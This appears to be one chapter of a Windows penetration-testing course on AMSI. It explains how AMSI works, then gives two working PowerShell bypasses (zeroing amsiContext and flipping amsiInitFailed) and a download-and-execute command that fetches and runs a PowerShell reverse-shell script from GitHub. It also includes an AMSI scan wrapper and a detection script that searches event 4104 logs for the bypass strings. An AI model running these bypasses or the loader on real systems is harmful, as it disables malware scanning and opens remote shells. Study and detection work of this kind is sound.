# 17 - AMSI Bypass

#### Topics

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **What is an Antivirus?**

An antivirus is software designed to detect, prevent, and remove malicious software (*malware*). Its purpose is to protect systems from threats such as viruses, worms, trojans, spyware, and ransomware.

Modern antivirus software employs various detection techniques:

1. **Signature-Based Detection**\
   Matches files against a database of known malware signatures (e.g., MD5 hash).
2. **Static Analysis**\
   Examines file properties and code structure for suspicious patterns.
3. **Dynamic Analysis**\
   Observes program behavior in real-time or in isolated environments like sandboxes to identify malicious actions.
4. **Machine Learning Models**\
   Uses predictive algorithms to detect unknown threats based on behavioral patterns.

### **Related Technologies**

Antivirus software often works in tandem with other security solutions:

* **Firewalls**: Block unauthorized network traffic.
* **Endpoint Detection and Response (EDR)**: Provides advanced threat hunting and endpoint protection.
* **Intrusion Detection/Prevention Systems (IDPS)**: Monitor networks for malicious activity.
* **Web Application Firewalls (WAF)**: Protect web applications from common attacks like SQL injection and cross-site scripting (XSS).

***

## **Antivirus in Windows**

Windows includes several built-in security technologies to safeguard users:

1. **Windows Defender Antivirus**: Real-time protection against malware and viruses.
2. **Firewall & Network Protection**: Blocks unauthorized traffic.
3. **Secure Boot**: Prevents unauthorized software from running during startup.
4. **BitLocker**: Encrypts disks to protect sensitive data.
5. **Windows Hello**: Password-free authentication using biometrics.

### **Windows Antimalware Scan Interface (AMSI)**

Introduced with Windows 10 in 2015, **AMSI** is a vendor-agnostic interface through which Windows applications hand memory buffers, files, and script content to the installed antimalware provider for scanning before that content executes.

**Key Features of AMSI:**

* Supported by PowerShell, WMI, and Office macros.
* Integrates with antivirus solutions for dynamic scans.
* Useful for analyzing script-based attacks, such as those using PowerShell or JavaScript.

**Workflow:**

1. The application requests a scan.
2. AMSI sends the request to an antivirus provider.
3. The antivirus scans the data and provides results.

**Examples of AMSI Scanning:**

* PowerShell scripts
* Office macros (e.g., VBA)
* .NET assemblies
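The three workflow steps above, driven from the application side by P/Invoking `amsi.dll` directly; this is an added example, not code from the original page. The C# wrapper class, the function name, the `AmsiWorkflowDemo` application name and the benign sample input are this example's own choices.

```powershell
if (-not ('AmsiNative' -as [type])) {
    Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class AmsiNative {
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiInitialize(string appName, out IntPtr amsiContext);
    [DllImport("amsi.dll")]
    public static extern void AmsiUninitialize(IntPtr amsiContext);
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiScanString(IntPtr amsiContext, string content,
        string contentName, IntPtr amsiSession, out int result);
}
'@
}

function Invoke-AmsiScan {
    param(
        [Parameter(Mandatory)][string]$Content,    # text handed to the provider
        [string]$ContentName = 'sample'            # label the provider sees in its logs
    )
    # Step 1: the application registers with AMSI and receives a context handle
    $ctx = [IntPtr]::Zero
    $hr = [AmsiNative]::AmsiInitialize('AmsiWorkflowDemo', [ref]$ctx)
    if ($hr -ne 0) { throw ('AmsiInitialize failed: 0x{0:X8}' -f $hr) }
    try {
        # Step 2: AMSI forwards the request to the registered antimalware provider
        $result = 0
        $hr = [AmsiNative]::AmsiScanString($ctx, $Content, $ContentName, [IntPtr]::Zero, [ref]$result)
        if ($hr -ne 0) { throw ('AmsiScanString failed: 0x{0:X8}' -f $hr) }
        # Step 3: interpret AMSI_RESULT: 0 = CLEAN, 1 = NOT_DETECTED,
        # 0x4000..0x4FFF = BLOCKED_BY_ADMIN, >= 32768 = DETECTED (what AmsiResultIsMalware tests)
        $verdict = 'NOT_DETECTED'
        if ($result -eq 0) { $verdict = 'CLEAN' }
        elseif ($result -ge 0x4000 -and $result -le 0x4FFF) { $verdict = 'BLOCKED_BY_ADMIN' }
        elseif ($result -ge 32768) { $verdict = 'DETECTED' }
        [pscustomobject]@{ ContentName = $ContentName; RawResult = $result; Verdict = $verdict }
    } finally {
        [AmsiNative]::AmsiUninitialize($ctx)
    }
}

# Constructed benign input; pass (Get-Content -Raw some.ps1) as -Content to scan a real file
Invoke-AmsiScan -Content 'Get-Date' -ContentName 'benign.ps1'
```

Microsoft's documented AMSI test string (see the developer guide linked under Other Resources) returns DETECTED here; note that a console script block containing that string is itself blocked by the same workflow before this code would even run.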

***

## **AMSI Bypass**

Despite AMSI's robust design, attackers have developed techniques to bypass its protections. These bypasses typically use PowerShell reflection to reach the private `AmsiUtils` members, or manipulate AMSI-related memory structures so that scan calls fail.

### **Modifying `amsiContext`**

The `System.Management.Automation.AmsiUtils` class handles AMSI interactions in PowerShell. The snippet below locates its static `amsiContext` field by reflection and overwrites the start of the structure it points to, invalidating the context so that later scan calls fail:

```powershell
# Reflect into PowerShell's private AmsiUtils class and pull its static fields
$fields=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static')
# FieldInfo.ToString() is "System.IntPtr amsiContext", so the wildcard selects that field
$amsiContext=$fields | Where-Object { $_ -like "*Context" }
[IntPtr]$amsiContextPointer=$amsiContext.GetValue($null)
# Overwrite the first 4 bytes of the context structure with zeros
[Int32[]]$emptyBuffer = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($emptyBuffer, 0, $amsiContextPointer, 1)
```

***

### **Setting `amsiInitFailed`**

PowerShell checks the static `amsiInitFailed` flag before each scan; this bypass sets it to `true` so PowerShell behaves as if AMSI initialization had failed and skips scanning:

```powershell
# Select the static amsiInitFailed field by name and flip it to $true
$amsiInitFailedField=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static') | Where-Object { $_.Name -like "amsiInitFailed" }
$amsiInitFailedField.SetValue($null, $true)
```

***

**Demonstration of AMSI Blocking a Malicious Script**

Attempting to load a malicious script like **Invoke-PowerShellTcp.ps1** results in an AMSI warning:

```powershell
iex (iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1" -UseBasicParsing).Content
```

**Error:**

```text
This script contains malicious content and has been blocked by your antivirus software.
```

After either bypass has run in the same PowerShell session, that process no longer receives scan results, and the same download-and-execute command succeeds.
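Defenders see these bypasses in two places: Defender signatures match the reflection strings themselves, and PowerShell Script Block Logging (event ID 4104) records the script text that ran. The following is an added example, not part of the original page, that hunts 4104 events for the patterns from the two snippets above; the pattern names, function names and sample script blocks are this example's own constructions, and the live hunt assumes Script Block Logging is enabled and the caller can read the Operational log.

```powershell
$AmsiTamperPatterns = @(
    @{ Name = 'AmsiUtils reflection';   Regex = 'Management\.Automation\.AmsiUtils' },
    @{ Name = 'amsiInitFailed flip';    Regex = 'amsiInitFailed' },
    @{ Name = 'amsiContext overwrite';  Regex = 'amsiContext|\*Context' },
    @{ Name = 'amsi.dll export lookup'; Regex = 'AmsiScanBuffer|AmsiScanString|AmsiOpenSession' }
)

function Get-AmsiTamperIndicators {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$ScriptBlockText)
    # -match is case-insensitive, which also covers mixed-case variants of these names
    foreach ($p in $AmsiTamperPatterns) {
        if ($ScriptBlockText -match $p.Regex) { $p.Name }
    }
}

function Find-AmsiTamperEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 4104 payload order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
        $text = [string]$_.Properties[2].Value
        $hits = @(Get-AmsiTamperIndicators -ScriptBlockText $text)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                Level         = $_.LevelDisplayName   # PowerShell logs suspicious blocks at Warning
                ScriptBlockId = $_.Properties[3].Value
                Indicators    = ($hits -join ', ')
                Snippet       = $text.Substring(0, [Math]::Min(100, $text.Length))
            }
        }
    }
}

# Constructed 4104 script block texts: one copy of the amsiInitFailed bypass, one benign block
$samples = @(
    '$f=[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetFields(''NonPublic,Static'') | ? { $_.Name -like "amsiInitFailed" }; $f.SetValue($null,$true)',
    'Get-ChildItem -Path C:\Windows\Temp | Sort-Object LastWriteTime'
)
foreach ($s in $samples) {
    $hits = @(Get-AmsiTamperIndicators -ScriptBlockText $s)
    if ($hits.Count) { "ALERT: $($hits -join ', ')" } else { 'ok: no AMSI tamper indicators' }
}
# Live hunt over the last six hours:
# Find-AmsiTamperEvents -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize
```

Because Defender's signatures match several of the same strings, the script block above may itself be flagged when pasted into an interactive console; running it on a log-collection host or SIEM avoids that. Plain string matching also misses obfuscated variants, so treat it as a first pass and correlate with 4104 events logged at Warning level.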

***

## Other Resources

* **AMSI Bypass Techniques Overview**:\
  [AMSI Bypass](https://www.youtube.com/watch?v=8y8saWvzeLw)
* **GitHub Repository with AMSI Bypass Examples**:\
  [S3cur3Th1sSh1t - AMSI Bypass](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
* **Microsoft AMSI Documentation**:\
  [AMSI Developer Guide](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-start-page)

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}

